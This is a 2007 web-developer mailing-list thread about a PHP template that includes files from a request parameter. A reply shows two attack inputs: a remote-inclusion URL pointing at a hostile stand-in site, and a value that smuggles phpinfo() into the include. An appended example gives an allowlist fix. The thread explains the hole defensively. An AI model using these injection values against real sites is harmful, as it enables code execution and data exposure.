Ok, I can see the problem now. Would someone be able to refer me to an adequate PHP site template? I've found this tutorial, but not sure if it's sufficient?

http://www.devarticles.com/c/a/MySQL/Implementing-a-Template-Based-Web-Site-With-PHP/

Thanks,
Peter

-----Original Message-----
From: Paul Bennett [mailto:Paul.Bennett at wcc.govt.nz]
Sent: Tuesday, May 15, 2007 3:04 PM
To: info at designbychen.com; thelist at lists.evolt.org
Subject: RE: [thelist] PHP template code security sufficient?

consider this:

template.php?page=http://www.my-nasty-cross-site-scripting-site.net/i-want-to-steal-your-cookies

<div class="body">
<?php @ require_once ("$page.html"); ?>
</div>

Or

template.php?page=test.html");phpinfo();echo ("redherring

Which could become something like:

<?php @ require_once ("test.html");phpinfo();echo ("redherring"); ?>

/*
Require some file
Print out all the php and server info to the user
Echo some useless data
*/

Depending upon how robust your security checks are (the article has no mention of any), this has the potential for injecting outside content into your rendered source code, which may have XSS vulnerabilities, or allowing the user to control script execution (as in the last example).

Just my 2c,
Paul
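
One way to close the hole described in the quoted message is to never build the include path from the request value, and to look the value up in a fixed allowlist instead. This is an added example, not code from the messages above or from the linked tutorial; the page names, the pages/ directory and resolve_page() are assumptions.

```php
<?php
// Added example: allowlist-based page resolution for a template.php-style script.
// PAGES_DIR, ALLOWED_PAGES and resolve_page() are hypothetical names.

const PAGES_DIR = __DIR__ . '/pages';

// Only keys in this map can ever be served; the values are fixed file names.
const ALLOWED_PAGES = [
    'home'    => 'home.html',
    'about'   => 'about.html',
    'contact' => 'contact.html',
];

/**
 * Map the untrusted ?page= value to a file path, or null if it is not allowed.
 */
function resolve_page($requested): ?string
{
    // Arrays (?page[]=x) and other non-strings are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup: URLs, quotes and appended code never match a key,
    // so no part of the request ever reaches the file path.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    return PAGES_DIR . '/' . ALLOWED_PAGES[$requested];
}

// Constructed sample inputs, including the two request shapes quoted above.
$samples = [
    'about',
    'http://www.my-nasty-cross-site-scripting-site.net/i-want-to-steal-your-cookies',
    'test.html");phpinfo();echo ("redherring',
    ['about'],
];
foreach ($samples as $s) {
    $label = is_string($s) ? $s : '(array input)';
    printf("%-45.45s => %s\n", $label, resolve_page($s) ?? 'REJECTED (404)');
}

// In template.php itself:
//   $file = resolve_page($_GET['page'] ?? 'home');
//   if ($file === null || !is_file($file)) { http_response_code(404); exit; }
//   readfile($file);   // static HTML: output it, do not execute it as PHP
```

Using readfile() rather than require for the static .html pages means that even a tampered page file is sent as text and not run as PHP.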